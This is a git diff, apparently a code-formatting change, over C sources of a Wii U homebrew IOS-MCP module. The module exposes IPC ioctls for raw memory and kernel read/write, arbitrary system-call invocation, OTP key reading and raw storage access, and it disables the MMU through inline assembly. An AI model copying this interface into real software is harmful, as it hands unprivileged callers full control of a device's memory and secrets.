unsigned int control_register = 0; - asm volatile("MRC p15, 0, %0, c1, c0, 0" : "=r" (control_register)); - asm volatile("MCR p15, 0, %0, c1, c0, 0" : : "r" (control_register & 0xFFFFEFFA)); + asm volatile("MRC p15, 0, %0, c1, c0, 0" + : "=r"(control_register)); + asm volatile("MCR p15, 0, %0, c1, c0, 0" + : + : "r"(control_register & 0xFFFFEFFA)); return control_register; } static inline void restore_mmu(unsigned int control_register) { - asm volatile("MCR p15, 0, %0, c1, c0, 0" : : "r" (control_register)); + asm volatile("MCR p15, 0, %0, c1, c0, 0" + : + : "r"(control_register)); } static inline void set_domain_register(unsigned int domain_register) { - asm volatile("MCR p15, 0, %0, c3, c0, 0" : : "r" (domain_register)); + asm volatile("MCR p15, 0, %0, c3, c0, 0" + : + : "r"(domain_register)); } #endif diff --git a/source/ios_mcp/source/fsa.c b/source/ios_mcp/source/fsa.c index 3cde0ab..8d756df 100644 --- a/source/ios_mcp/source/fsa.c +++ b/source/ios_mcp/source/fsa.c @@ -1,9 +1,9 @@ -#include -#include -#include -#include "svc.h" -#include "imports.h" #include "fsa.h" +#include "imports.h" +#include "svc.h" +#include +#include +#include static void *allocIobuf() { void *ptr = svcAlloc(0xCAFF, 0x828); @@ -18,12 +18,12 @@ static void freeIobuf(void *ptr) { } int FSA_Mount(int fd, char *device_path, char *volume_path, u32 flags, char *arg_string, int arg_string_len) { - u8 *iobuf = allocIobuf(); - u8 *inbuf8 = iobuf; - u8 *outbuf8 = &iobuf[0x520]; + u8 *iobuf = allocIobuf(); + u8 *inbuf8 = iobuf; + u8 *outbuf8 = &iobuf[0x520]; iovec_s *iovec = (iovec_s *) &iobuf[0x7C0]; - u32 *inbuf = (u32 *) inbuf8; - u32 *outbuf = (u32 *) outbuf8; + u32 *inbuf = (u32 *) inbuf8; + u32 *outbuf = (u32 *) outbuf8; strncpy((char *) &inbuf8[0x04], device_path, 0x27F); strncpy((char *) &inbuf8[0x284], volume_path, 0x27F); @@ -44,8 +44,8 @@ int FSA_Mount(int fd, char *device_path, char *volume_path, u32 flags, char *arg } int FSA_Unmount(int fd, char *path, u32 flags) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; strncpy((char *) &inbuf[0x01], path, 0x27F); @@ -58,8 +58,8 @@ int FSA_Unmount(int fd, char *path, u32 flags) { } int FSA_FlushVolume(int fd, char *volume_path) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; strncpy((char *) &inbuf[0x01], volume_path, 0x27F); @@ -71,8 +71,8 @@ int FSA_FlushVolume(int fd, char *volume_path) { } int FSA_MakeDir(int fd, char *path, u32 flags) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; strncpy((char *) &inbuf[0x01], path, 0x27F); @@ -85,8 +85,8 @@ int FSA_MakeDir(int fd, char *path, u32 flags) { } int FSA_OpenDir(int fd, char *path, int *outHandle) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; strncpy((char *) &inbuf[0x01], path, 0x27F); @@ -100,8 +100,8 @@ int FSA_OpenDir(int fd, char *path, int *outHandle) { } int FSA_ReadDir(int fd, int handle, directoryEntry_s *out_data) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; inbuf[1] = handle; @@ -115,8 +115,8 @@ int FSA_ReadDir(int fd, int handle, directoryEntry_s *out_data) { } int FSA_RewindDir(int fd, int handle) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; inbuf[1] = handle; @@ -128,8 +128,8 @@ int FSA_RewindDir(int fd, int handle) { } int FSA_CloseDir(int fd, int handle) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; inbuf[1] = handle; @@ -141,8 +141,8 @@ int FSA_CloseDir(int fd, int handle) { } int FSA_ChangeDir(int fd, char *path) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; strncpy((char *) &inbuf[0x01], path, 0x27F); @@ -154,8 +154,8 @@ int FSA_ChangeDir(int fd, char *path) { } int FSA_OpenFile(int fd, char *path, char *mode, int *outHandle) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; strncpy((char *) &inbuf[0x01], path, 0x27F); @@ -170,12 +170,12 @@ int FSA_OpenFile(int fd, char *path, char *mode, int *outHandle) { } int _FSA_ReadWriteFile(int fd, void *data, u32 size, u32 cnt, int fileHandle, u32 flags, bool read) { - u8 *iobuf = allocIobuf(); - u8 *inbuf8 = iobuf; - u8 *outbuf8 = &iobuf[0x520]; + u8 *iobuf = allocIobuf(); + u8 *inbuf8 = iobuf; + u8 *outbuf8 = &iobuf[0x520]; iovec_s *iovec = (iovec_s *) &iobuf[0x7C0]; - u32 *inbuf = (u32 *) inbuf8; - u32 *outbuf = (u32 *) outbuf8; + u32 *inbuf = (u32 *) inbuf8; + u32 *outbuf = (u32 *) outbuf8; inbuf[0x08 / 4] = size; inbuf[0x0C / 4] = cnt; @@ -193,7 +193,8 @@ int _FSA_ReadWriteFile(int fd, void *data, u32 size, u32 cnt, int fileHandle, u3 int ret; if (read) ret = svcIoctlv(fd, 0x0F, 1, 2, iovec); - else ret = svcIoctlv(fd, 0x10, 2, 1, iovec); + else + ret = svcIoctlv(fd, 0x10, 2, 1, iovec); freeIobuf(iobuf); return ret; @@ -208,8 +209,8 @@ int FSA_WriteFile(int fd, void *data, u32 size, u32 cnt, int fileHandle, u32 fla } int FSA_StatFile(int fd, int handle, fileStat_s *out_data) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; inbuf[1] = handle; @@ -223,8 +224,8 @@ int FSA_StatFile(int fd, int handle, fileStat_s *out_data) { } int FSA_CloseFile(int fd, int fileHandle) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; inbuf[1] = fileHandle; @@ -236,8 +237,8 @@ int FSA_CloseFile(int fd, int fileHandle) { } int FSA_SetPosFile(int fd, int fileHandle, u32 position) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; inbuf[1] = fileHandle; @@ -250,8 +251,8 @@ int FSA_SetPosFile(int fd, int fileHandle, u32 position) { } int FSA_GetStat(int fd, char *path, fileStat_s *out_data) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; strncpy((char *) &inbuf[0x01], path, 0x27F); @@ -266,8 +267,8 @@ int FSA_GetStat(int fd, char *path, fileStat_s *out_data) { } int FSA_Remove(int fd, char *path) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; strncpy((char *) &inbuf[0x01], path, 0x27F); @@ -279,8 +280,8 @@ int FSA_Remove(int fd, char *path) { } int FSA_ChangeMode(int fd, char *path, int mode) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; strncpy((char *) &inbuf[0x01], path, 0x27F); @@ -297,8 +298,8 @@ int FSA_ChangeMode(int fd, char *path, int mode) { // 0x08 : device size in sectors (u64) // 0x10 : device sector size (u32) int FSA_GetDeviceInfo(int fd, char *device_path, int type, u32 *out_data) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; strncpy((char *) &inbuf[0x01], device_path, 0x27F); @@ -339,8 +340,8 @@ int FSA_GetDeviceInfo(int fd, char *device_path, int type, u32 *out_data) { } int FSA_RawOpen(int fd, char *device_path, int *outHandle) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; strncpy((char *) &inbuf[0x01], device_path, 0x27F); @@ -354,8 +355,8 @@ int FSA_RawOpen(int fd, char *device_path, int *outHandle) { } int FSA_RawClose(int fd, int device_handle) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; inbuf[1] = device_handle; @@ -368,12 +369,12 @@ int FSA_RawClose(int fd, int device_handle) { // offset in blocks of 0x1000 bytes int FSA_RawRead(int fd, void *data, u32 size_bytes, u32 cnt, u64 blocks_offset, int device_handle) { - u8 *iobuf = allocIobuf(); - u8 *inbuf8 = iobuf; - u8 *outbuf8 = &iobuf[0x520]; + u8 *iobuf = allocIobuf(); + u8 *inbuf8 = iobuf; + u8 *outbuf8 = &iobuf[0x520]; iovec_s *iovec = (iovec_s *) &iobuf[0x7C0]; - u32 *inbuf = (u32 *) inbuf8; - u32 *outbuf = (u32 *) outbuf8; + u32 *inbuf = (u32 *) inbuf8; + u32 *outbuf = (u32 *) outbuf8; // note : offset_bytes = blocks_offset * size_bytes inbuf[0x08 / 4] = (blocks_offset >> 32); @@ -398,12 +399,12 @@ int FSA_RawRead(int fd, void *data, u32 size_bytes, u32 cnt, u64 blocks_offset, } int FSA_RawWrite(int fd, void *data, u32 size_bytes, u32 cnt, u64 blocks_offset, int device_handle) { - u8 *iobuf = allocIobuf(); - u8 *inbuf8 = iobuf; - u8 *outbuf8 = &iobuf[0x520]; + u8 *iobuf = allocIobuf(); + u8 *inbuf8 = iobuf; + u8 *outbuf8 = &iobuf[0x520]; iovec_s *iovec = (iovec_s *) &iobuf[0x7C0]; - u32 *inbuf = (u32 *) inbuf8; - u32 *outbuf = (u32 *) outbuf8; + u32 *inbuf = (u32 *) inbuf8; + u32 *outbuf = (u32 *) outbuf8; inbuf[0x08 / 4] = (blocks_offset >> 32); inbuf[0x0C / 4] = (blocks_offset & 0xFFFFFFFF); diff --git a/source/ios_mcp/source/fsa.h b/source/ios_mcp/source/fsa.h index b464546..d356071 100644 --- a/source/ios_mcp/source/fsa.h +++ b/source/ios_mcp/source/fsa.h @@ -1,12 +1,14 @@ #ifndef FSA_H #define FSA_H +#include "types.h" + typedef struct { u32 flag; u32 permission; u32 owner_id; u32 group_id; - u32 size; // size in bytes + u32 size; // size in bytes u32 physsize; // physical size on disk in bytes u32 unk[3]; u32 id; @@ -20,10 +22,10 @@ typedef struct { char name[0x100]; } directoryEntry_s; -#define DIR_ENTRY_IS_DIRECTORY 0x80000000 +#define DIR_ENTRY_IS_DIRECTORY 0x80000000 #define FSA_MOUNTFLAGS_BINDMOUNT (1 << 0) -#define FSA_MOUNTFLAGS_GLOBAL (1 << 1) +#define FSA_MOUNTFLAGS_GLOBAL (1 << 1) int FSA_Open(); diff --git a/source/ios_mcp/source/imports.h b/source/ios_mcp/source/imports.h index 72ee497..d110b37 100644 --- a/source/ios_mcp/source/imports.h +++ b/source/ios_mcp/source/imports.h @@ -1,11 +1,11 @@ #ifndef IMPORTS_H #define IMPORTS_H -#include -#include #include "types.h" +#include +#include -#define MCP_SVC_BASE ((void*)0x050567EC) +#define MCP_SVC_BASE ((void *) 0x050567EC) void usleep(u32 time); diff --git a/source/ios_mcp/source/ipc.c b/source/ios_mcp/source/ipc.c index 8dd4e83..0a44d65 100644 --- a/source/ios_mcp/source/ipc.c +++ b/source/ios_mcp/source/ipc.c @@ -21,59 +21,58 @@ * 3. This notice may not be removed or altered from any source * distribution. ***************************************************************************/ -#include -#include -#include -#include "imports.h" -#include "fsa.h" -#include "svc.h" -#include "logger.h" -#include "fsa.h" -#include "wupserver.h" #include "../../common/kernel_commands.h" +#include "fsa.h" +#include "imports.h" +#include "logger.h" +#include "svc.h" +#include "wupserver.h" +#include +#include +#include -#define IOS_ERROR_UNKNOWN_VALUE 0xFFFFFFD6 -#define IOS_ERROR_INVALID_ARG 0xFFFFFFE3 -#define IOS_ERROR_INVALID_SIZE 0xFFFFFFE9 -#define IOS_ERROR_UNKNOWN 0xFFFFFFF7 -#define IOS_ERROR_NOEXISTS 0xFFFFFFFA +#define IOS_ERROR_UNKNOWN_VALUE 0xFFFFFFD6 +#define IOS_ERROR_INVALID_ARG 0xFFFFFFE3 +#define IOS_ERROR_INVALID_SIZE 0xFFFFFFE9 +#define IOS_ERROR_UNKNOWN 0xFFFFFFF7 +#define IOS_ERROR_NOEXISTS 0xFFFFFFFA -#define IOCTL_MEM_WRITE 0x00 -#define IOCTL_MEM_READ 0x01 -#define IOCTL_SVC 0x02 -#define IOCTL_KILL_SERVER 0x03 -#define IOCTL_MEMCPY 0x04 -#define IOCTL_REPEATED_WRITE 0x05 -#define IOCTL_KERN_READ32 0x06 -#define IOCTL_KERN_WRITE32 0x07 -#define IOCTL_READ_OTP 0x08 +#define IOCTL_MEM_WRITE 0x00 +#define IOCTL_MEM_READ 0x01 +#define IOCTL_SVC 0x02 +#define IOCTL_KILL_SERVER 0x03 +#define IOCTL_MEMCPY 0x04 +#define IOCTL_REPEATED_WRITE 0x05 +#define IOCTL_KERN_READ32 0x06 +#define IOCTL_KERN_WRITE32 0x07 +#define IOCTL_READ_OTP 0x08 -#define IOCTL_FSA_OPEN 0x40 -#define IOCTL_FSA_CLOSE 0x41 -#define IOCTL_FSA_MOUNT 0x42 -#define IOCTL_FSA_UNMOUNT 0x43 -#define IOCTL_FSA_GETDEVICEINFO 0x44 -#define IOCTL_FSA_OPENDIR 0x45 -#define IOCTL_FSA_READDIR 0x46 -#define IOCTL_FSA_CLOSEDIR 0x47 -#define IOCTL_FSA_MAKEDIR 0x48 -#define IOCTL_FSA_OPENFILE 0x49 -#define IOCTL_FSA_READFILE 0x4A -#define IOCTL_FSA_WRITEFILE 0x4B -#define IOCTL_FSA_STATFILE 0x4C -#define IOCTL_FSA_CLOSEFILE 0x4D -#define IOCTL_FSA_SETFILEPOS 0x4E -#define IOCTL_FSA_GETSTAT 0x4F -#define IOCTL_FSA_REMOVE 0x50 -#define IOCTL_FSA_REWINDDIR 0x51 -#define IOCTL_FSA_CHDIR 0x52 -#define IOCTL_FSA_RENAME 0x53 -#define IOCTL_FSA_RAW_OPEN 0x54 -#define IOCTL_FSA_RAW_READ 0x55 -#define IOCTL_FSA_RAW_WRITE 0x56 -#define IOCTL_FSA_RAW_CLOSE 0x57 -#define IOCTL_FSA_CHANGEMODE 0x58 -#define IOCTL_FSA_FLUSHVOLUME 0x59 +#define IOCTL_FSA_OPEN 0x40 +#define IOCTL_FSA_CLOSE 0x41 +#define IOCTL_FSA_MOUNT 0x42 +#define IOCTL_FSA_UNMOUNT 0x43 +#define IOCTL_FSA_GETDEVICEINFO 0x44 +#define IOCTL_FSA_OPENDIR 0x45 +#define IOCTL_FSA_READDIR 0x46 +#define IOCTL_FSA_CLOSEDIR 0x47 +#define IOCTL_FSA_MAKEDIR 0x48 +#define IOCTL_FSA_OPENFILE 0x49 +#define IOCTL_FSA_READFILE 0x4A +#define IOCTL_FSA_WRITEFILE 0x4B +#define IOCTL_FSA_STATFILE 0x4C +#define IOCTL_FSA_CLOSEFILE 0x4D +#define IOCTL_FSA_SETFILEPOS 0x4E +#define IOCTL_FSA_GETSTAT 0x4F +#define IOCTL_FSA_REMOVE 0x50 +#define IOCTL_FSA_REWINDDIR 0x51 +#define IOCTL_FSA_CHDIR 0x52 +#define IOCTL_FSA_RENAME 0x53 +#define IOCTL_FSA_RAW_OPEN 0x54 +#define IOCTL_FSA_RAW_READ 0x55 +#define IOCTL_FSA_RAW_WRITE 0x56 +#define IOCTL_FSA_RAW_CLOSE 0x57 +#define IOCTL_FSA_CHANGEMODE 0x58 +#define IOCTL_FSA_FLUSHVOLUME 0x59 static int ipcNodeKilled; static u8 threadStack[0x1000] __attribute__((aligned(0x20))); @@ -102,7 +101,7 @@ static int ipc_ioctl(ipcmessage *message) { if ((message->ioctl.length_in < 4) || (message->ioctl.length_io < 4)) { res = IOS_ERROR_INVALID_SIZE; } else { - int svc_id = message->ioctl.buffer_in[0]; + int svc_id = message->ioctl.buffer_in[0]; int size_arguments = message->ioctl.length_in - 4; u32 arguments[8]; @@ -110,8 +109,8 @@ static int ipc_ioctl(ipcmessage *message) { memcpy(arguments, message->ioctl.buffer_in + 1, (size_arguments < 8 * 4) ? size_arguments : (8 * 4)); // return error code as data - message->ioctl.buffer_io[0] = ((int (*const)(u32, u32, u32, u32, u32, u32, u32, u32)) (MCP_SVC_BASE + svc_id * 8))(arguments[0], arguments[1], arguments[2], arguments[3], arguments[4], - arguments[5], arguments[6], arguments[7]); + message->ioctl.buffer_io[0] = ((int (*const)(u32, u32, u32, u32, u32, u32, u32, u32))(MCP_SVC_BASE + svc_id * 8))(arguments[0], arguments[1], arguments[2], arguments[3], arguments[4], + arguments[5], arguments[6], arguments[7]); } break; } @@ -132,10 +131,10 @@ static int ipc_ioctl(ipcmessage *message) { if (message->ioctl.length_in < 12) { res = IOS_ERROR_INVALID_SIZE; } else { - u32 *dst = (u32 *) message->ioctl.buffer_in[0]; + u32 *dst = (u32 *) message->ioctl.buffer_in[0]; u32 *cache_range = (u32 *) (message->ioctl.buffer_in[0] & ~0xFF); - u32 value = message->ioctl.buffer_in[1]; - u32 n = message->ioctl.buffer_in[2]; + u32 value = message->ioctl.buffer_in[1]; + u32 n = message->ioctl.buffer_in[2]; u32 old = *dst; int i; @@ -190,68 +189,68 @@ static int ipc_ioctl(ipcmessage *message) { break; } case IOCTL_FSA_CLOSE: { - int fd = message->ioctl.buffer_in[0]; + int fd = message->ioctl.buffer_in[0]; message->ioctl.buffer_io[0] = svcClose(fd); break; } case IOCTL_FSA_MOUNT: { - int fd = message->ioctl.buffer_in[0]; - char *device_path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1]; - char *volume_path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[2]; - u32 flags = message->ioctl.buffer_in[3]; - char *arg_string = (message->ioctl.buffer_in[4] > 0) ? (((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[4]) : 0; + int fd = message->ioctl.buffer_in[0]; + char *device_path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1]; + char *volume_path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[2]; + u32 flags = message->ioctl.buffer_in[3]; + char *arg_string = (message->ioctl.buffer_in[4] > 0) ? (((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[4]) : 0; int arg_string_len = message->ioctl.buffer_in[5]; message->ioctl.buffer_io[0] = FSA_Mount(fd, device_path, volume_path, flags, arg_string, arg_string_len); break; } case IOCTL_FSA_UNMOUNT: { - int fd = message->ioctl.buffer_in[0]; + int fd = message->ioctl.buffer_in[0]; char *device_path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1]; - u32 flags = message->ioctl.buffer_in[2]; + u32 flags = message->ioctl.buffer_in[2]; message->ioctl.buffer_io[0] = FSA_Unmount(fd, device_path, flags); break; } case IOCTL_FSA_GETDEVICEINFO: { - int fd = message->ioctl.buffer_in[0]; + int fd = message->ioctl.buffer_in[0]; char *device_path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1]; - int type = message->ioctl.buffer_in[2]; + int type = message->ioctl.buffer_in[2]; message->ioctl.buffer_io[0] = FSA_GetDeviceInfo(fd, device_path, type, message->ioctl.buffer_io + 1); break; } case IOCTL_FSA_OPENDIR: { - int fd = message->ioctl.buffer_in[0]; + int fd = message->ioctl.buffer_in[0]; char *path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1]; message->ioctl.buffer_io[0] = FSA_OpenDir(fd, path, (int *) message->ioctl.buffer_io + 1); break; } case IOCTL_FSA_READDIR: { - int fd = message->ioctl.buffer_in[0]; + int fd = message->ioctl.buffer_in[0]; int handle = message->ioctl.buffer_in[1]; message->ioctl.buffer_io[0] = FSA_ReadDir(fd, handle, (directoryEntry_s *) (message->ioctl.buffer_io + 1)); break; } case IOCTL_FSA_CLOSEDIR: { - int fd = message->ioctl.buffer_in[0]; + int fd = message->ioctl.buffer_in[0]; int handle = message->ioctl.buffer_in[1]; message->ioctl.buffer_io[0] = FSA_CloseDir(fd, handle); break; } case IOCTL_FSA_MAKEDIR: { - int fd = message->ioctl.buffer_in[0]; + int fd = message->ioctl.buffer_in[0]; char *path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1]; - u32 flags = message->ioctl.buffer_in[2]; + u32 flags = message->ioctl.buffer_in[2]; message->ioctl.buffer_io[0] = FSA_MakeDir(fd, path, flags); break; } case IOCTL_FSA_OPENFILE: { - int fd = message->ioctl.buffer_in[0]; + int fd = message->ioctl.buffer_in[0]; char *path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1]; char *mode = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[2]; @@ -259,119 +258,119 @@ static int ipc_ioctl(ipcmessage *message) { break; } case IOCTL_FSA_READFILE: { - int fd = message->ioctl.buffer_in[0]; - u32 size = message->ioctl.buffer_in[1]; - u32 cnt = message->ioctl.buffer_in[2]; + int fd = message->ioctl.buffer_in[0]; + u32 size = message->ioctl.buffer_in[1]; + u32 cnt = message->ioctl.buffer_in[2]; int fileHandle = message->ioctl.buffer_in[3]; - u32 flags = message->ioctl.buffer_in[4]; + u32 flags = message->ioctl.buffer_in[4]; message->ioctl.buffer_io[0] = FSA_ReadFile(fd, ((u8 *) message->ioctl.buffer_io) + 0x40, size, cnt, fileHandle, flags); break; } case IOCTL_FSA_WRITEFILE: { - int fd = message->ioctl.buffer_in[0]; - u32 size = message->ioctl.buffer_in[1]; - u32 cnt = message->ioctl.buffer_in[2]; + int fd = message->ioctl.buffer_in[0]; + u32 size = message->ioctl.buffer_in[1]; + u32 cnt = message->ioctl.buffer_in[2]; int fileHandle = message->ioctl.buffer_in[3]; - u32 flags = message->ioctl.buffer_in[4]; + u32 flags = message->ioctl.buffer_in[4]; message->ioctl.buffer_io[0] = FSA_WriteFile(fd, ((u8 *) message->ioctl.buffer_in) + 0x40, size, cnt, fileHandle, flags); break; } case IOCTL_FSA_STATFILE: { - int fd = message->ioctl.buffer_in[0]; + int fd = message->ioctl.buffer_in[0]; int fileHandle = message->ioctl.buffer_in[1]; message->ioctl.buffer_io[0] = FSA_StatFile(fd, fileHandle, (fileStat_s *) (message->ioctl.buffer_io + 1)); break; } case IOCTL_FSA_CLOSEFILE: { - int fd = message->ioctl.buffer_in[0]; + int fd = message->ioctl.buffer_in[0]; int fileHandle = message->ioctl.buffer_in[1]; message->ioctl.buffer_io[0] = FSA_CloseFile(fd, fileHandle); break; } case IOCTL_FSA_SETFILEPOS: { - int fd = message->ioctl.buffer_in[0]; + int fd = message->ioctl.buffer_in[0]; int fileHandle = message->ioctl.buffer_in[1]; - u32 position = message->ioctl.buffer_in[2]; + u32 position = message->ioctl.buffer_in[2]; message->ioctl.buffer_io[0] = FSA_SetPosFile(fd, fileHandle, position); break; } case IOCTL_FSA_GETSTAT: { - int fd = message->ioctl.buffer_in[0]; + int fd = message->ioctl.buffer_in[0]; char *path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1]; message->ioctl.buffer_io[0] = FSA_GetStat(fd, path, (fileStat_s *) (message->ioctl.buffer_io + 1)); break; } case IOCTL_FSA_REMOVE: { - int fd = message->ioctl.buffer_in[0]; + int fd = message->ioctl.buffer_in[0]; char *path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1]; message->ioctl.buffer_io[0] = FSA_Remove(fd, path); break; } case IOCTL_FSA_REWINDDIR: { - int fd = message->ioctl.buffer_in[0]; + int fd = message->ioctl.buffer_in[0]; int dirFd = message->ioctl.buffer_in[1]; message->ioctl.buffer_io[0] = FSA_RewindDir(fd, dirFd); break; } case IOCTL_FSA_CHDIR: { - int fd = message->ioctl.buffer_in[0]; + int fd = message->ioctl.buffer_in[0]; char *path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1]; message->ioctl.buffer_io[0] = FSA_ChangeDir(fd, path); break; } case IOCTL_FSA_RAW_OPEN: { - int fd = message->ioctl.buffer_in[0]; + int fd = message->ioctl.buffer_in[0]; char *path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1]; message->ioctl.buffer_io[0] = FSA_RawOpen(fd, path, (int *) (message->ioctl.buffer_io + 1)); break; } case IOCTL_FSA_RAW_READ: { - int fd = message->ioctl.buffer_in[0]; - u32 block_size = message->ioctl.buffer_in[1]; - u32 cnt = message->ioctl.buffer_in[2]; + int fd = message->ioctl.buffer_in[0]; + u32 block_size = message->ioctl.buffer_in[1]; + u32 cnt = message->ioctl.buffer_in[2]; u64 sector_offset = ((u64) message->ioctl.buffer_in[3] << 32ULL) | message->ioctl.buffer_in[4]; - int deviceHandle = message->ioctl.buffer_in[5]; + int deviceHandle = message->ioctl.buffer_in[5]; message->ioctl.buffer_io[0] = FSA_RawRead(fd, ((u8 *) message->ioctl.buffer_io) + 0x40, block_size, cnt, sector_offset, deviceHandle); break; } case IOCTL_FSA_RAW_WRITE: { - int fd = message->ioctl.buffer_in[0]; - u32 block_size = message->ioctl.buffer_in[1]; - u32 cnt = message->ioctl.buffer_in[2]; + int fd = message->ioctl.buffer_in[0]; + u32 block_size = message->ioctl.buffer_in[1]; + u32 cnt = message->ioctl.buffer_in[2]; u64 sector_offset = ((u64) message->ioctl.buffer_in[3] << 32ULL) | message->ioctl.buffer_in[4]; - int deviceHandle = message->ioctl.buffer_in[5]; + int deviceHandle = message->ioctl.buffer_in[5]; message->ioctl.buffer_io[0] = FSA_RawWrite(fd, ((u8 *) message->ioctl.buffer_in) + 0x40, block_size, cnt, sector_offset, deviceHandle); break; } case IOCTL_FSA_RAW_CLOSE: { - int fd = message->ioctl.buffer_in[0]; + int fd = message->ioctl.buffer_in[0]; int deviceHandle = message->ioctl.buffer_in[1]; message->ioctl.buffer_io[0] = FSA_RawClose(fd, deviceHandle); break; } case IOCTL_FSA_CHANGEMODE: { - int fd = message->ioctl.buffer_in[0]; + int fd = message->ioctl.buffer_in[0]; char *path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1]; - int mode = message->ioctl.buffer_in[2]; + int mode = message->ioctl.buffer_in[2]; message->ioctl.buffer_io[0] = FSA_ChangeMode(fd, path, mode); break; } case IOCTL_FSA_FLUSHVOLUME: { - int fd = message->ioctl.buffer_in[0]; + int fd = message->ioctl.buffer_in[0]; char *path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1]; message->ioctl.buffer_io[0] = FSA_FlushVolume(fd, path); @@ -451,5 +450,4 @@ void ipc_deinit(void) { svcIoctl(fd, IOCTL_KILL_SERVER, &dummy, sizeof(dummy), &dummy, sizeof(dummy)); svcClose(fd); } - } diff --git a/source/ios_mcp/source/ipc_types.h b/source/ios_mcp/source/ipc_types.h index 46ced18..d89fe05 100644 --- a/source/ios_mcp/source/ipc_types.h +++ b/source/ios_mcp/source/ipc_types.h @@ -3,21 +3,21 @@ #include "types.h" -#define IOS_COMMAND_INVALID 0x00 -#define IOS_OPEN 0x01 -#define IOS_CLOSE 0x02 -#define IOS_READ 0x03 -#define IOS_WRITE 0x04 -#define IOS_SEEK 0x05 -#define IOS_IOCTL 0x06 -#define IOS_IOCTLV 0x07 -#define IOS_REPLY 0x08 -#define IOS_IPC_MSG0 0x09 -#define IOS_IPC_MSG1 0x0A -#define IOS_IPC_MSG2 0x0B -#define IOS_SUSPEND 0x0C -#define IOS_RESUME 0x0D -#define IOS_SVCMSG 0x0E +#define IOS_COMMAND_INVALID 0x00 +#define IOS_OPEN 0x01 +#define IOS_CLOSE 0x02 +#define IOS_READ 0x03 +#define IOS_WRITE 0x04 +#define IOS_SEEK 0x05 +#define IOS_IOCTL 0x06 +#define IOS_IOCTLV 0x07 +#define IOS_REPLY 0x08 +#define IOS_IPC_MSG0 0x09 +#define IOS_IPC_MSG1 0x0A +#define IOS_IPC_MSG2 0x0B +#define IOS_SUSPEND 